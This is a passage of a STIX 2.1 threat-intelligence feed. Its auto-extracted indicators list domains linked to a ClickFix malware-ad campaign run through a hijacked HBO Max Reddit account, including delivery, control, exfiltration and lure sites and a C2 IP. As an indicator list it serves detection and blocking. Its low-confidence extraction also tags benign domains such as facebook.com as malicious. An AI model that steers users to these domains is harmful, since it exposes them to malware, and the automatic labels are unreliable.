News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a217ca0a-c7e7-4057-b80e-83be5f8f2051","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: denverplumbingandwaterheater.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: vmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellare","pattern":"[domain-name:value = 'denverplumbingandwaterheater.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b06272a6-5207-431c-94c1-e7a1b96c7198","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: desktop-version.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]","pattern":"[domain-name:value = 'desktop-version.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c04ea57-bcd7-41af-b51a-ce63fb0a0d57","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: dogtrainersgeorgia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: dscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com;","pattern":"[domain-name:value = 'dogtrainersgeorgia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a142b06b-d922-4d21-8f09-c005461093c5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ember-bridge.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--894dc42c-e9a9-48bb-b0d8-aab63188ba5c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: facebook.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3 Amatera direct-to-IP TLS command-and-control server using facebook[.]com SNI IP address 165.22.199[.]85 September macOS telemetry","pattern":"[domain-name:value = 'facebook.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--39a70d81-4ea3-49b2-bf26-176c40ba02fe","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: fern-plume.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: y and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov","pattern":"[domain-name:value = 'fern-plume.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26dbfec9-5eaa-48d4-8ec3-8b5a5eab452c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: filequanticore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ss 38.244.158[.]56 AMOS helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbo","pattern":"[domain-name:value = 'filequanticore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0382808-de51-4f64-ba51-1505827df85c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: filesiriuscore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: S helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; brigh","pattern":"[domain-name:value = 'filesiriuscore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49aa841b-c77d-4809-b348-c4fd70954495","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: flutelikelurkerunsinewy.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; clean-disk-guide[.]com Copied-command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain","pattern":"[domain-name:value = 'flutelikelurkerunsinewy.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--278af2f5-c20c-4d5d-82b0-fcfca2592d27","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gatemaden.space","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ntal[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and","pattern":"[domain-name:value = 'gatemaden.space']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c43f8ac2-6eb2-4480-adb6-c86845bbe9e6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: getnova.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-la","pattern":"[domain-name:value = 'getnova.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--596c356f-78f6-4aee-b85e-3dac9f7f8f37","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gigappyworld.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales","pattern":"[domain-name:value = 'gigappyworld.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aed129cd-8a69-41ad-9839-4f9d3791181d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: glowmedaesthetics.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]","pattern":"[domain-name:value = 'glowmedaesthetics.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--144aa819-6d8c-496c-8404-f79dc145f37d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: glrack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com","pattern":"[domain-name:value = 'glrack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--553330c5-cbcc-4e6f-a23e-5002a4167a9a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gogolfonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: kestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]co","pattern":"[domain-name:value = 'gogolfonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdbbd5ab-9037-417e-8663-b1ab97ec24d5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: grove-12.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com","pattern":"[domain-name:value = 'grove-12.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--274a55ca-3cd3-4263-bd83-c84bf5bcff30","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: habar55.namebright.bike","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: akenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli","pattern":"[domain-name:value = 'habar55.namebright.bike']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d9c8b20-235b-497e-b035-8c8817d5ff7f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: harbor-29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; vers","pattern":"[domain-name:value = 'harbor-29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da7e18a0-5a8c-4008-ab10-d8214b6843bc","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account gave the actors a trusted advert","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--857852e5-f1dc-49b0-8a06-3e2628975d52","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.app","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: blocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07ddbb11-15c4-4599-9a8e-d6c173c33896","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as doma","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--219d3ad0-e352-452f-9981-e43fbfb98e6d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbubagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: arbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;","pattern":"[domain-name:value = 'hbubagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f99d4b3-30c4-4f41-9946-7480357c0272","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: heroestales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]co","pattern":"[domain-name:value = 'heroestales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c2d28cb-67b8-41dc-b2f1-645a695c40d3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: homebrwmac-hub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: adesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains Domai","pattern":"[domain-name:value = 'homebrwmac-hub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b55b1762-8888-43ba-96b1-e3140dce4512","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: houstongaragedoorinstallers.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com September macOS telemetry and delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; ai","pattern":"[domain-name:value = 'houstongaragedoorinstallers.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5b8ff85-b623-494e-a52e-ffbaa9915ec0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lakhov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: me[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and","pattern":"[domain-name:value = 'lakhov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b07566b4-77d9-4627-bc0a-a7afdf6c4483","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lalandscapelighting.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia","pattern":"[domain-name:value = 'lalandscapelighting.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efd90e4c-3e37-4712-b85d-6dd6021640d9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: leaf68.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: trefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; p","pattern":"[domain-name:value = 'leaf68.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ff9ff3e5-28b2-4eda-8c0c-0cb29ea1c502","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: loop-lumen.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains","pattern":"[domain-name:value = 'loop-lumen.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdc63f96-37ce-4a4d-8c68-9460c2e7fc80","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: macdeveloperhub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: s-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;","pattern":"[domain-name:value = 'macdeveloperhub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--392aba7a-f7b0-4fe3-b119-a599b3763db5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: macfixguide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rec","pattern":"[domain-name:value = 'macfixguide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dfd7c050-b836-414a-aa48-b354748f019d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: macstoragetips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: va-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage","pattern":"[domain-name:value = 'macstoragetips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c0d9512f-f31c-46a4-9b23-b946d9553563","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: marbellaresales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com Ma","pattern":"[domain-name:value = 'marbellaresales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5594d384-5580-4ba8-a367-ca12970d157d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: microsoftupdater.info","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: page[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]","pattern":"[domain-name:value = 'microsoftupdater.info']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de43d481-e0de-4393-bda4-38ac3f0575cf","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mpasvw.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domai","pattern":"[domain-name:value = 'mpasvw.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9249a89-5f39-4ade-a258-ab286bb5b2ae","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: muse-code-ide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; cl","pattern":"[domain-name:value = 'muse-code-ide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 